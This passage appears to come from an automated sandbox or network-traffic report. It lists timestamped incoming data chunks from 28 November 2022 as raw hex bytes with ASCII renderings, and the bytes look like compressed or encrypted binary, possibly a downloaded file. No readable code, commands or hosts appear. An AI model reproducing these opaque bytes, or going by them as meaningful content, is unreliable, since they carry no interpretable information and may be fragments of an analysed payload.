j\gbN9ZJ.R1\5PvPJPiZEfnZ"0+QZAX<9"*c"WpRa8a;{=P
2022-11-28 18:03:20 UTC	52	IN	Data Raw: d1 cd ba b5 93 db 68 1f b5 53 85 cc e1 4a 2a e8 7f ba 3c 58 b9 15 4e 47 c3 69 e9 78 d6 2a b1 ee c5 d3 83 48 19 1e 1c e8 21 1c 41 5a 5c bc 80 e8 5d 6c ad c3 74 05 6d 47 e8 0e a4 0c 96 89 47 e3 fd 4d f2 b8 3d 49 86 7b db a5 78 90 93 fd 8d 97 53 33 f6 fa 44 ff 74 ac b3 9a ca 93 73 96 39 9d f5 61 57 3c d1 0a ab 97 9b 7a bb 56 5f b0 5e a5 c8 6a aa 8c 4f db 2b d4 23 1f 7d 70 74 26 8a 99 e3 b2 bc 97 4e f3 74 3b 92 fa c8 af 8a 10 36 dc 53 cf db b0 86 a7 b0 ee 15 4d 88 01 61 15 38 7e ae 7d 58 3d b9 4f 0d 4e 9d 58 59 e4 df ea ac 0a 68 22 70 24 92 e8 12 18 3e 9d 5c 6f 99 c4 a1 97 12 9a 6a 15 0c 32 a2 33 27 9f 01 24 3c c4 41 f4 3c 82 27 83 dc 75 b6 d9 3a c4 5d 07 67 83 31 5a ff b8 57 6e ba 4f 59 74 85 9d cc aa 58 d0 b4 39 58 af 05 08 99 e3 c7 1d ab f4 89 82 06 64 d4 Data Ascii: hSJ<XNGixH!AZ\]ltmGGM=I{xS3Dts9aW<zV_^jO+#}pt&Nt;6SMa8~}X=ONXYh"p$>\oj23'$<A<'u:]g1ZWnOYtX9Xd
2022-11-28 18:03:20 UTC	53	IN	Data Raw: f7 84 a4 98 82 46 5a ca 19 7e 9e 45 67 38 e1 f3 a6 3b 60 82 74 57 f0 d1 1c 59 02 c7 99 f3 a9 1b 71 83 6c 51 98 be b9 59 86 a1 fd d7 f4 68 00 87 1d 3a 69 03 c4 f1 70 29 d1 94 57 db 78 c5 c2 05 c7 12 4b 49 e1 30 f8 d0 81 20 0c 1e f5 e2 82 5f 31 68 e4 db 1f 39 00 9f 70 ca 55 39 e3 79 0c 4e ac 55 fb c5 a2 34 90 5e 65 24 97 32 4c 20 d7 26 70 6d 6e ad 0a 90 18 09 54 72 3a 6d 55 27 c0 0d 46 86 40 99 4c 83 cb 11 a0 5d 33 e7 3d 69 81 13 dd af 4d 03 1d 8d 3d 2e 4d 05 15 82 a7 3b 61 97 8b a6 c6 34 1d 18 09 61 ce c0 a8 c3 29 0a ff cb 94 9a 2f 52 b1 4d 8d 6b f6 8c af f4 c4 75 79 90 0c 99 62 6f 40 e4 fb b9 71 af cb 6f fb 2b 2a 29 41 ac ea 33 14 5e d8 0c 47 01 d6 ab a3 7e e6 b8 5a cc 41 eb 84 11 1d 91 77 ec 9c 59 fb 0b 94 df d9 48 30 49 8b 81 f1 af 1d fd 86 74 8c 65 e6 Data Ascii: FZ~Eg8;`tWYqlQYh:ip)WxKI0 _1h9pU9yNU4^e$2L &pmnTr:mU'F@L]3=iM=.M;a4a)/RMkuybo@qo+*)A3^G~ZAwYH0Ite
2022-11-28 18:03:20 UTC	55	IN	Data Raw: a6 1d 7f 70 46 d5 b3 27 16 e5 e7 ab 32 27 57 ce 32 6e 49 ba 61 ed be 56 34 48 fb 46 d3 cd f6 78 22 8d 82 55 79 87 42 f2 73 1a 2d bc 2a 73 9d 18 3e 9d 94 02 02 59 f2 7b 7d 7b 39 39 9f 41 ea bc 86 cc 4d ca 2c 85 09 60 f5 bd c9 9c ab 88 a1 42 51 d3 8a 7b 64 a5 3d d8 41 85 0b 71 80 be 8f 29 0b a9 22 4e ab 65 b0 6f 6a cf f8 48 27 c2 37 95 4c 03 66 90 eb 56 df 82 1a ab ff 41 e9 69 0e a2 04 14 cc 3b 9b 85 ae 39 38 df 3c 9c 0d 4f 83 8a ef 19 45 cc ba ce dd 8d 90 87 e7 eb 43 f9 a2 57 18 c9 36 08 ce d8 7b 0c 71 14 8f 9e cb 85 38 f1 b8 1d 82 f3 a6 be 40 ff 8e 69 7e 2a 67 c6 f4 0f b3 ae d0 b4 0c da db d2 a1 1d 8c bb bd 8a a4 97 4e ef d9 fb de 28 6f 39 bb 72 03 f1 e3 84 9a 9d cd de 32 5a 0b f7 f0 78 26 e9 a8 f9 be e6 fc 0c 0d 58 14 28 7e 64 21 9d dc 31 3c e5 8c 41 b4 Data Ascii: pF'2'W2nIaV4HFx"UyBs-s>Y{}{99AM,`BQ{d=Aq)"NeojH'7LfVAi;98<OECW6{q8@i~gN(o9r2Zx&X(~d!1<A
2022-11-28 18:03:20 UTC	56	IN	Data Raw: 7a 9c 06 3f 31 a6 13 47 bb 53 48 e5 50 5d f0 bf da 2f 19 22 89 be 0f fa 34 f9 6d 0f b5 fd 58 f6 0f 5e 8b b0 45 04 c5 93 2c 5d 28 45 18 a2 d9 57 9d e5 03 c4 8e 54 ef f6 de 69 84 12 fc ad 86 a7 d5 27 86 d1 a1 cf 92 1b fb 87 93 4b 3c 9e 2c 4e 81 72 96 6a 94 5c ea b0 48 0f 17 74 69 a3 41 eb 0c 89 71 3f 9d 76 e6 97 9f 43 7a f3 29 73 3a d0 c5 55 ee 8e 9a 1b 32 01 c7 82 9f d5 c9 12 c5 5e 45 4b f0 e2 35 9c f5 2c bb 95 55 20 bc 50 62 04 19 6f cd e4 c2 cc dd 2f 77 c7 04 e4 26 ea eb 8a 9d 44 c3 a0 d6 3e cd aa 00 7c ea 8a 1c 19 4c a4 69 dd 23 32 33 54 c6 64 a4 be 26 e5 48 39 00 03 41 7b 57 05 87 f3 c3 2b 69 93 1f 7d 66 a4 b0 ed df bd 27 c7 2e d3 b3 f5 73 e1 af f9 07 b6 da 20 e7 24 15 e6 df fe ef a3 f4 18 5a 7f 57 b5 be 87 02 27 2e 41 fe f4 c7 20 06 06 11 76 1a ac 97 Data Ascii: z?1GSHP]/"4mX^E,](EWTi'K<,Nrj\HtiAq?vCz)s:U2^EK5,U Pbo/w&D>\|Li#23Td&H9A{W+i}f'.s $ZW'.A v
2022-11-28 18:03:20 UTC	57	IN	Data Raw: 06 f0 83 be 1e 65 95 03 40 93 44 d8 f3 bd 38 81 5d 34 ab 7f 13 33 a5 9f ca bf c8 ff d1 17 54 8a cb 90 0c 7b 22 d2 b7 62 d0 b0 8e 9b 8f 55 82 de 90 b0 85 8d cc a1 4d ec 27 83 ac 14 1b 7f ca 7a fd a6 61 db dc 62 55 cc dd b6 7e 2d 2c fe 72 0d e1 b6 20 91 b4 c6 39 b8 ae 65 c6 6e b3 1a 98 ad 87 8d 63 e1 2d f4 83 30 74 c9 af 36 1d 88 90 64 1d 59 01 8e b9 81 66 c8 c6 db d1 8b bd 9f 1c 43 ba 93 51 42 0e 30 c6 f6 18 78 6e 5e e7 b4 02 46 35 91 c3 42 60 58 c7 2f 81 43 b3 0d ec 52 73 ab df bd 81 fd e5 a2 da 28 ab 4a 11 a9 85 e3 0d 1a a2 1c 84 c5 ff 7a c7 9d 65 8e 52 48 74 c5 58 26 a4 e5 90 d1 c3 f8 bd ab 11 bb 50 3c bc f1 03 69 28 01 5c 09 74 62 0d 51 ac 5a 49 70 bb f0 73 fe 92 06 ee ba 2c 3c 2e 43 f8 cf b6 0d 25 08 7e 5f 0c 4d ad d8 05 32 71 75 4b bb a9 3d 0a 1d 34 Data Ascii: e@D8]43T{"bUM'zabU~-,r 9enc-0t6dYfCQB0xn^F5B`X/CRs(JzeRHtX&P<i(\tbQZIps,<.C%~_M2quK=4
2022-11-28 18:03:20 UTC	58	IN	Data Raw: 97 1d a1 4d 1b 48 fe 04 c5 3b 9f e7 0f 17 b4 11 05 d4 61 32 6a 66 ab 4c 99 18 0f e9 f9 d6 c1 13 9c f6 ad 7a 6b 7b 70 a4 f8 0e ab 28 be 7e e5 50 64 ce e4 50 a4 04 a9 dd eb 47 33 86 76 2e a4 53 6c b9 1c 80 19 de 85 11 d9 7e 3a ee 10 13 7c 26 ea 33 ea 05 32 79 06 d4 5a ab 23 35 6f 51 b5 8b ad f2 90 0f 04 76 5c ba 54 c6 51 ce a6 40 93 c8 cb 07 b5 be cd c5 0f e1 7a 89 b4 c7 95 a9 23 e4 75 57 9b ad 90 1d 18 e2 4a 99 cb 4b 33 91 b0 a4 8a 70 f5 61 11 22 3c d1 33 19 0a 63 fe bd bb f1 b4 72 90 8a d8 54 08 8b fb 61 21 e5 79 9b 48 5f 53 68 b5 28 b0 e5 49 cd 58 20 ed a9 dd 19 78 85 fe 81 68 e7 6f 99 90 4c 0c 14 81 70 12 dc 73 d5 64 87 60 b1 a7 04 6a 04 e1 61 c6 57 e7 f9 28 74 97 69 5b ee 11 cd be 53 54 e9 fb fa 8a ad 95 7b a3 9f 8f 1e 09 fe 68 80 44 9a eb 60 d6 75 76 Data Ascii: MH;a2jfLzk{p(~PdPG3v.Sl~:\|&32yZ#5oQv\TQ@z#uWJK3pa"<3crTa!yH_Sh(IX xhoLpsd`jaW(ti[ST{hD`uv
2022-11-28 18:03:20 UTC	59	IN	Data Raw: 88 18 16 5a b5 ce f7 3d 4b 8e b9 62 72 00 95 c9 07 0c 52 f3 17 7c be 11 63 ee 36 e8 e6 26 5b e7 09 90 64 13 db c5 85 cf fb 15 f2 25 a7 4e c7 2f b4 69 b3 9d 07 ab e4 57 f5 1e bb ed cd 90 2c 65 58 9b 82 0a a6 9e 4e de a7 b5 34 c0 f5 90 01 60 be 29 b9 50 03 e7 f9 2d 92 d7 72 3e 17 f6 ac 69 d6 34 83 18 b1 0f d1 89 c0 19 3a 36 6b ee 91 1e 5f cf 3d d2 5f 81 26 13 1d f2 fa c8 43 36 ae 45 56 77 f6 f5 31 21 37 ed 14 26 b7 23 e4 b6 13 0f 8a 5b 9f a4 93 18 ba 00 28 55 eb f9 cf 2f 09 05 28 7f 5f 0c a2 b1 f7 7b ab 07 86 e9 ac 61 60 7d de 36 57 36 d3 4c e8 3e a2 8b 4a 18 40 a4 0c 43 f4 41 c7 c9 0e f4 81 7e 39 87 e5 9a a2 b5 1a ff 11 5f 4e 2f 72 8c 13 0b 3c 81 f7 73 6a 81 61 ce c7 36 60 23 73 25 ef 61 0b a8 7b 09 c6 8a ba 6d 0a 4d fe a3 fb 57 53 fe f3 17 d2 2f 3c d2 80 Data Ascii: Z=KbrR\|c6&[d%N/iW,eXN4`)P-r>i4:6k_=_&C6EVw1!7&#[(U/(_{a`}6W6L>J@CA~9_N/r<sja6`#s%a{mMWS/<
2022-11-28 18:03:20 UTC	61	IN	Data Raw: 1f 9b c5 1b 59 8f 04 fe 46 3a 37 8a b3 55 7f 0e f1 20 51 95 11 a1 ed d5 ad 47 19 5f 5f 87 d9 2c 40 93 f0 1f 06 b5 be f5 26 f5 fd 0c c3 e1 5f e3 cb 01 71 e3 ce 74 a9 43 63 81 94 66 71 cc a4 ff 94 7a d3 20 3d c1 57 2d 2e cc 0e c9 aa 93 15 dd 80 66 3d 2b eb e6 a9 e9 89 d4 1c 5d f4 25 e5 79 53 4e f8 c6 fe b9 c4 ad 39 a6 c1 a1 18 4a 3c d5 f6 74 08 c8 18 1e 91 61 99 90 94 46 d9 be e9 fd 18 26 2c ca 12 9d b1 a7 cc 70 9c 97 eb 6a 80 3c d8 93 5f e5 4a 5a 35 f1 55 c8 f9 84 06 cf 1d b6 34 e3 60 ee 4c b2 bd 3a 67 87 44 19 ca 5a a6 29 13 95 8a 52 13 68 55 00 09 af 45 48 00 4c cc 6a e8 8a 70 83 e8 9d 4e 34 f7 34 ba dc 82 88 f6 6f 95 fa 9a dc c7 77 1e 95 0b a0 40 bf 3c d3 e2 9a d5 a4 83 48 9a 36 49 f2 6f b4 88 d1 6c ca 9a 21 b9 b9 c3 12 2e d1 80 c0 6c 4f 07 d2 2b 49 5f Data Ascii: YF:7U QG__,@&_qtCcfqz =W-.f=+]%ySN9J<taF&,pj<_JZ5U4`L:gDZ)RhUEHLjpN44ow@<H6Iol!.lO+I_
2022-11-28 18:03:20 UTC	62	IN	Data Raw: e9 e4 2d 2b 48 b1 db fb d7 98 85 41 d6 72 98 c2 d9 20 b4 7c 2f e2 c1 1c 8a 88 ff 7a ce 0a a4 b1 ea 01 1e 2d 7f 0a 1c e5 ec 9e 23 22 22 3a a8 c1 36 3a 44 56 77 5e d0 4c 8c 19 b5 62 4c 3b dd 71 49 14 81 00 98 75 5a 3b 0f 14 e0 4a 44 96 c2 24 16 d3 70 91 d2 5f 0c 9d 66 d9 70 28 d3 08 38 9c bf 82 3f 53 ff 02 8d 6e 92 f6 e1 ac 96 69 cd a8 67 6a 02 bb bc f3 31 db d8 1b c4 7c 7b 37 09 fe 59 63 89 50 5f 73 a3 a1 04 6a c7 c3 46 31 4f 5b b2 a1 8e c8 e5 7e 20 49 cd 05 06 9e 52 98 39 3d 4e 6a f9 f4 da a1 84 37 12 7b cb 28 7a b5 e3 03 da bc 0f c0 c8 39 d0 20 52 d1 53 2c 98 ef ab 47 03 10 6f ee 28 6a 38 f9 d5 4e 56 09 b9 b9 f4 c0 93 bf 47 70 71 9c 60 0f eb 8b 97 68 90 21 fb bf 06 03 9a b4 d3 2f 49 12 53 93 ad d5 1f 90 dc 45 e8 a2 32 e6 3a 28 fb 5a e7 27 ad 1d ef 55 f0 Data Ascii: -+HAr \|/z-#"":6:DVw^LbL;qIuZ;JD$p_fp(8?Snigj1\|{7YcP_sjF1O[~ IR9=Nj7{(z9 RS,Go(j8NVGpq`h!/ISE2:(Z'U
2022-11-28 18:03:20 UTC	63	IN	Data Raw: f5 9c 1b f0 0e 64 8a cd 30 2f 02 87 e9 1d 04 9a 79 83 18 5a 97 5e 53 50 db 69 ec 71 80 48 5a 72 6b 17 bb fa fd 27 00 28 fd d5 14 3b 60 90 94 49 1a 75 3d 55 b5 9d 6f 56 9f d7 91 92 3c ba 1e c9 ca de 30 51 80 e1 69 b1 0e 1a e0 33 17 44 ef 4e 46 48 1c 56 98 5d 2a 40 3b 8a f2 69 a2 70 88 22 7f 9e 7a fb 38 a5 df 56 33 c7 18 d2 37 2b 1b 6a 1e 29 4b c9 34 8f 16 bf 9a 4e b0 e0 34 ba e5 d2 fa 8e bb 39 e2 72 1d 25 3f 1e 16 30 a5 17 85 35 8c 54 5a 3a be 21 08 34 1e 10 34 47 3b a5 cb af 77 1f f4 d3 b9 56 27 20 2d a1 30 f7 63 62 c5 d4 1a 5f 8f 40 dc 8e 99 84 7c a8 92 17 3f 93 87 c0 dc ac f9 3d d0 f2 a1 8b 2d cf c6 a4 3f dc 5c 65 93 af fd a8 09 06 d7 7f b5 69 3e 71 88 5f 46 12 68 b4 d4 d8 3c 33 2a 7d 13 4f ec 3a 7d 81 62 8b 5b 1d 2d 6e 65 e4 ae cd 08 ca 02 1b 62 15 1b Data Ascii: d0/yZ^SPiqHZrk'(;`Iu=UoV<0Qi3DNFHV]@;ip"z8V37+j)K4N49r%?05TZ:!44G;wV' -0cb_@\|?=-?\ei>q_Fh<3}O:}b[-neb
2022-11-28 18:03:20 UTC	64	IN	Data Raw: 20 0e cb 00 80 70 76 e2 5f 0c ae 38 e8 fa 9b 71 fe 63 31 a1 3d 11 a8 dd fd 41 df c5 cf b3 3b 77 e7 73 9d 05 90 f5 0b 22 4c 50 72 cf 0e 33 3c 90 63 d1 d0 cd 54 8a e9 b7 81 f2 08 13 ba 1c 51 16 4d 74 38 69 ed 9e 68 44 72 0b a5 9d 90 f9 77 93 e0 8a 78 cf 35 d3 ab 39 4c ae b5 78 93 c4 1e 12 71 ae 82 59 90 fc aa 0b 6a b5 b7 b9 fd 5c 6c 5b 51 e5 d8 aa b9 b8 84 bb 6b 38 b2 38 9e 1f 09 84 8b 79 c0 8f b7 47 70 74 1e a0 73 b8 e3 b1 1e bb 25 45 67 88 29 9a e3 03 81 6a 77 c0 bb 9b 61 34 90 5e 65 b1 a7 5a d5 16 96 ce 08 1c 06 a5 82 e4 18 18 88 5b d2 bf ed 18 bc 9f b6 bd f1 0c b3 6a 0a 65 f7 57 8a 0f 02 80 54 ec 84 93 a5 b9 7d 1a 2e 08 52 56 15 31 ed c4 9e fd c0 78 fe 7b b5 65 03 9e 5b 9e 93 0b 1e 2b 00 dc ab ef 1c 92 c2 d6 85 4a a7 0f 39 15 28 9c 95 ec e7 7c d3 6f 25 Data Ascii: pv_8qc1=A;ws"LPr3<cTQMt8ihDrwx59LxqYj\l[Qk88yGpts%Eg)jwa4^eZ[jeWT}.RV1x{e[+J9(\|o%
2022-11-28 18:03:20 UTC	66	IN	Data Raw: ac cc 9f b9 00 ff 83 22 da af 2e c5 1f 09 8a c6 f6 9d e5 90 97 d7 ec 00 af b7 1e 39 c4 d5 ed 12 83 b7 84 3e f1 e7 77 f0 9f 82 41 33 a6 01 86 bf 7d 33 95 fb 44 20 87 8f 22 bd 39 f2 06 e8 30 6f 76 a7 7c 8c 7b 44 42 bf 21 74 f0 7e aa 70 c0 e1 db 6e 93 dd b0 80 b9 b9 6e 97 60 29 17 cf 1f 46 Data Ascii: ".9>wA3}3D "90ov\|{DB!t~pnn`)F
2022-11-28 18:03:20 UTC	66	IN	Data Raw: 8c 76 ec f5 77 1b bf dc df c1 33 ca 0b ed 72 c1 84 c1 64 57 ac 2e 3e 4d 9f 9c 21 59 07 cc ed 4b 2e bd ab 24 50 ea 62 48 61 28 d2 30 3b c0 71 02 57 b9 6f 87 89 18 e4 2a 5e b0 53 a4 47 e0 e5 a5 02 c9 ff 48 61 95 46 5e a8 76 81 a0 5d 09 2a aa 91 c0 54 53 7b d9 9f cb 00 c4 8d 41 db d8 5e 26 83 a0 f9 19 ae de 43 87 09 12 99 93 c9 e2 36 87 f8 6e 4d 2c fe 72 cb a4 4a 79 56 31 9e 90 b8 62 04 e2 38 ec 22 77 f1 f2 82 f6 e0 7b 0b fe 9b 08 e0 51 21 f0 7c 23 bf 1b 76 32 87 b8 81 1a 44 59 99 62 6a c7 ba 1e c9 90 06 00 3f 04 f2 fd 5e 96 c6 91 9b 11 8c d5 24 e9 5f e5 cd de f8 4a 52 49 77 93 13 17 f4 32 0f 24 2d c9 b7 1d 06 d7 72 3e c2 54 23 65 7b de 99 6f 0b 7a 93 68 cd 1e a5 d5 62 55 fe 8b a9 b3 e3 5b dd 96 91 2d 84 84 bf 5e 86 38 91 3e 21 76 5e 5a f8 40 a7 c3 5a 36 dd Data Ascii: vw3rdW.>M!YK.$PbHa(0;qWo^SGHaF^v]TS{A^&C6nM,rJyV1b8"w{Q!\|#v2DYbj?^$_JRIw2$-r>T#e{ozhbU[-^8>!v^Z@Z6
2022-11-28 18:03:20 UTC	67	IN	Data Raw: ff 19 5f 48 18 71 43 2d 40 b6 a4 bd 1a ae 70 bd b4 b2 00 0f 5c a0 f8 f8 cf ba 59 16 8f eb 52 4c 83 95 3d f3 88 ec 3e 29 22 86 c4 13 81 74 aa c5 b3 c6 66 39 ce 59 2a a9 c7 64 3a e8 01 fc 3a e3 fa 01 7e 47 8e 26 c0 22 7f 28 f6 c4 7b 5f cf 52 3f 9d c9 b8 b8 f7 55 cb 78 96 12 3d 72 5c af 7d f9 cc 50 93 0a c3 da d9 7e 1d af d5 78 5c f4 2d 33 97 fd b4 29 fa bb 53 59 8f 93 c5 ef 1d be b2 42 96 81 f1 af 1b 8b 23 70 fd 4d 8d cb 45 09 57 b0 8b 30 29 d9 e5 fe 91 f8 34 4a 10 46 6c 0a b5 30 97 74 96 bd 7f 05 da 60 42 ad b9 fb e3 1d 13 a3 42 28 90 db e3 d1 30 73 28 cf 79 c7 12 40 a7 e7 f5 9c 11 b3 2e 53 4a 8d 87 02 33 2e 41 f0 c4 ea 24 eb 0f e1 ed a1 c4 03 5d 0c e8 6b fb 0f 1b 21 99 a6 e2 c9 78 bb 0f fa 00 d4 af ff 4f 39 97 ad 81 70 2d d0 26 00 b4 10 ef be 6f b9 a6 2e Data Ascii: _HqC-@p\YRL=>)"tf9Y*d::~G&"({_R?Ux=r\}P~x\-3)SYB#pMEW0)4JFl0t`BB(0s(y@.SJ3.A$]k!xO9p-&o.
2022-11-28 18:03:20 UTC	68	IN	Data Raw: b7 62 49 15 0c 0e f8 cc d8 39 bf 30 4f c8 b9 45 d6 5f 2c f9 a9 be 17 8e 05 7b fd d2 a9 9a e9 59 de 58 3e c0 9f 79 85 e9 64 d6 a4 4a ba 61 ed 43 98 33 cd e7 66 76 4c 1a 87 51 f3 48 a9 1b 32 0b 5e 85 df 7f 50 b4 0f 9d 6f cd b4 84 17 18 0f 7e 0d c5 88 a7 e9 c7 42 b8 e0 c9 1a 15 ab 2e c4 ce 31 32 80 8e 3c 2c 65 6a f1 89 6c d0 6e c2 de 6d ea a9 00 b0 fe c2 bb f4 32 c4 6b bc d7 98 4d 5b d6 72 98 c2 d9 20 61 54 90 c0 6e 0b dc 32 ff f1 90 35 b8 22 8e fe 8b 74 1c 1e ab 45 4d 90 13 0f 7c ef b6 7e 96 a9 44 f0 77 d4 49 54 c3 d2 74 62 ea 02 35 88 70 bc 96 5a 8d fe bf 31 24 b6 89 df bb 7f 03 58 e1 03 d9 56 ea a1 9b c4 bc c3 fb 25 e5 d1 6b ca db fd 7a 7c a7 42 7d 86 05 f5 e2 94 6a 27 08 e9 0d 01 bd 63 9a 36 70 8d d8 c3 ed 7c 7b 53 9a 2e f5 b3 bf d2 35 19 c8 f2 84 8c 70 Data Ascii: bI90OE_,{YX>ydJaC3fvLQH2^Po~B.12<,ejlnm2kM[r aTn25"tEM\|~DwITtb5pZ1$XV%kz\|B}j'c6p\|{S.5p
2022-11-28 18:03:20 UTC	69	IN	Data Raw: e7 fd 92 6f 4d c9 17 6c 5a af f3 a8 08 62 c2 65 e2 13 ea 47 47 2d 9f c4 fe 5f 2f 5b c5 28 b0 50 6f 91 ba 7f 4e e9 17 fc ed 34 72 f5 23 ac 25 6b 73 be 3f 9a 42 ba d0 50 b5 f7 37 88 b2 81 bc ea 31 bb f2 66 3d 64 8a 66 41 be 03 f9 20 41 fb d3 e6 c6 f3 d4 12 2e 6a 56 4e 4e 9f f5 1e 60 fd 89 e7 77 16 9b 02 ab fb 24 f4 ad 63 8f ab 88 b1 48 76 01 28 0b 76 70 a8 62 69 3f a2 8e 6f ec b9 d5 f2 8a fb f4 75 da 4e 1e 75 e0 ac 34 c3 b1 a1 83 4d 35 34 b4 13 a5 1e f8 fc 4d 00 fe 29 ce a4 be 19 5c d1 3a 28 df 9c 89 a7 8a 65 12 9e bf 2c b9 ce 7a 93 db 70 88 0a b9 1d ca 97 f0 b8 63 cb 33 be 99 2e 9c 0f 48 9c 95 45 1d 2a d5 0e fc 0a 48 0e e1 4e 69 ea 60 aa d7 cb b8 1f 16 ef 5d db 04 b1 bf 1d 8b f6 c2 0b a4 26 d9 f7 cb c4 ce 95 b9 75 ba 49 b7 ed 06 9f 3c 54 f9 2d a7 2e 9b cd Data Ascii: oMlZbeGG-_/[(PoN4r#%ks?BP71f=dfA A.jVNN`w$cHv(vpbi?ouNu4M54M)\:(e,zpc3.HE*HNi`]&uI<T-.
2022-11-28 18:03:20 UTC	71	IN	Data Raw: 85 cf 23 23 6a 53 25 dc cb cb 87 32 50 e6 8c 80 7d ed 78 a0 54 e1 44 b2 b5 13 5d 2f 85 e5 7a ff 54 a8 0d ac 34 c0 fd fa 01 60 76 3d 21 26 a1 73 16 11 3b dd e7 f9 11 f6 f2 57 35 1e 13 c9 9e e7 d1 89 c0 6f 3a 36 6b ee fd 47 ed c7 0b 3d 93 56 eb 5e 3e c3 ef 38 47 c6 ac 53 8b 9a a1 a5 3f a0 fb d4 c3 e8 da 38 46 8a 16 e2 ef 55 99 3a 04 cb dd 89 b5 53 3e 41 cf b6 23 fc aa c9 a0 aa 41 f8 8d 7f bc 8f cb 6b 99 be 6a 93 92 e7 68 90 ef af d5 d4 4d 47 eb d4 c2 63 0d 35 4e 32 ea 5b ea 69 e7 d2 1a f2 25 a0 9e f1 cd 76 54 a1 41 c8 84 8a 65 b1 63 20 3b de 9d db 0b 92 cf d1 51 85 aa 88 cb 5e 9e 3e 96 58 0e a7 32 f9 96 e9 c3 98 29 78 f6 f0 71 26 d3 59 96 fb 1e 9e d5 ad 0c 0f 32 90 5f d9 69 28 61 5f 7b 48 b5 ba 15 a3 a3 7d e2 b5 de 7e 6f 67 cf 95 26 c9 bb 60 f9 67 4a 3f 33 Data Ascii: ##jS%2P}xTD]/zT4`v=!&s;W5o:6kG=V^>8GS?8FU:S>A#AkjhMGc5N2[i%vTAec ;Q^>X2)xq&Y2_i(a_{H}~og&`gJ?3
2022-11-28 18:03:20 UTC	72	IN	Data Raw: 04 77 f7 0a b6 95 b5 5b d1 32 3c 2d e8 95 74 f8 78 54 82 81 94 56 1f f2 47 cd 42 95 1f 9b d7 c1 64 13 cd f0 a0 fb 8d 87 fa 11 71 c8 0f 20 e9 09 65 14 29 e6 13 8d db 83 b0 30 74 f3 c7 25 d2 23 c0 ad 67 aa 4a b4 b8 9b 1b 5d f6 74 00 f0 18 1e 99 5d 17 54 df 94 ea fd 4b 78 de 03 28 59 2d 14 3b ad 55 ee 90 34 c6 ca f0 3c d8 93 7f 30 65 b6 05 28 76 b7 f4 58 02 20 c1 31 aa 32 77 0f 4c b2 a5 0c 32 ce 6f 40 67 e9 c7 43 60 a6 e1 83 30 39 46 b0 b9 86 39 2e 89 5f a5 bf da 1b e9 f5 fb 2a fe 6b be 52 33 f3 69 5d d1 be a5 22 37 1f a6 11 97 5b 2d f6 fa 32 92 ea 35 8c ae 72 17 da 96 bf 66 18 34 a4 aa f6 e5 67 66 95 fc 59 c3 10 14 86 65 75 eb 5e ef 80 20 70 5f 66 84 3b 70 74 26 8a 99 e3 b2 bc 97 1a f6 75 04 10 d3 93 c5 4c 81 cc 48 f2 cf a4 b3 52 fd 83 c5 6d b6 0a 70 6d f3 Data Ascii: w[2<-txTVGBdq e)0t%#gJ]t]TKx(Y-;U4<0e(vX 12wL2o@gC`09F9._*kR3i]"7[-25rf4gfYeu^ p_f;pt&uLHRmpm
2022-11-28 18:03:20 UTC	73	IN	Data Raw: de da 67 56 84 93 66 fb a1 31 ea d3 7b dd b0 c9 35 bd 64 f7 63 5f 8e ae 22 71 49 29 69 88 26 26 0c 84 8f e3 76 4a d1 15 6c 30 1e d6 70 0b bf 5f 0c ae 38 e8 fb 9b 66 60 4a ca e8 6b 11 c8 82 fd 41 3e b0 51 31 00 36 4c 64 43 20 94 43 5c 22 57 1c 72 cf 06 8a 8c 22 39 01 fa d9 72 d2 ee a0 4f 4a 24 c1 13 0b 9a 1f 81 4b 34 c1 3f 45 72 e6 e6 b6 a8 21 ec ea e0 3d a3 89 21 60 0c 1a b0 5e f1 99 10 74 1a eb f5 22 df a4 a5 d0 3d e7 d8 61 1d e0 fe 7f cb 08 46 f9 61 5f 6b 08 b7 ba 0a a3 a3 7d ac b5 de 7a 6f 67 cf d7 26 c5 41 43 8a 11 36 37 31 b9 e3 db 9f b7 a8 56 73 b8 46 76 8b 67 53 0f 44 50 13 d6 91 a1 6f b7 a1 cb 29 d7 e8 aa 82 45 8e 9e 82 b9 76 d8 14 f5 60 75 e1 7f 37 1b 3f 5b ae ae 58 05 eb 6a 35 6b d6 6d 27 3c 31 51 14 b0 e2 70 e0 3d 25 21 91 11 9a 13 0d 79 07 ac Data Ascii: gVf1{5dc_"qI)i&&vJl0p_8f`JkA>Q16LdC C\"Wr"9rOJ$K4?Er!=!`^t"=aFa_k}zog&AC671VsFvgSDPo)Ev`u7?[Xj5km'<1Qp=%!y
2022-11-28 18:03:20 UTC	74	IN	Data Raw: 06 96 80 c0 50 00 94 5c 98 15 81 70 25 aa 36 f0 5a 77 1b 60 2e b9 ce 90 5e 13 25 d2 a5 ae 29 dc 38 e7 b2 6e 5e cc f9 8c 12 40 66 c5 c9 44 95 e2 d5 81 b8 24 fa aa a5 a2 43 a6 08 66 d4 ec 00 b8 20 01 38 86 6c 1e 13 83 c5 85 86 bb 18 4f 22 06 f9 ae 33 59 fe 76 6c b8 b6 81 6d 96 05 2d 69 18 f3 38 f2 12 e9 30 6f 40 b9 f9 9a 43 3e a1 6b b8 02 75 22 dc 0b f8 8c 59 83 93 dd 19 95 b5 46 56 ed 15 28 38 b5 df 7a 41 35 9d f5 fe 1f bf dc ab 9e cd cc 6c 92 a1 c0 2b 31 13 a6 cc 80 06 37 ff 6d 68 23 bd 56 5a 3f b9 37 29 5f 32 ef 11 93 a9 27 a3 30 9f c4 71 02 07 34 62 a4 1e cb 30 55 9f b0 7d b5 cf ee 72 c8 61 77 ff 48 1d 05 42 39 d9 76 3d a3 5d 09 21 18 cd eb 1f 22 cd d8 9f 07 1b 97 de 29 15 8b 8b 06 2f b7 81 81 15 05 ec 06 58 ec 66 e1 14 5e cf 44 c0 ba e6 02 52 de a2 a1 Data Ascii: P\p%6Zw`.^%)8n^@fD$Cf 8lO"3Yvlm-i80o@C>ku"YFV(8zA5l+17mh#VZ?7)_2'0q4b0U}rawHB9v=]!")/Xf^DR
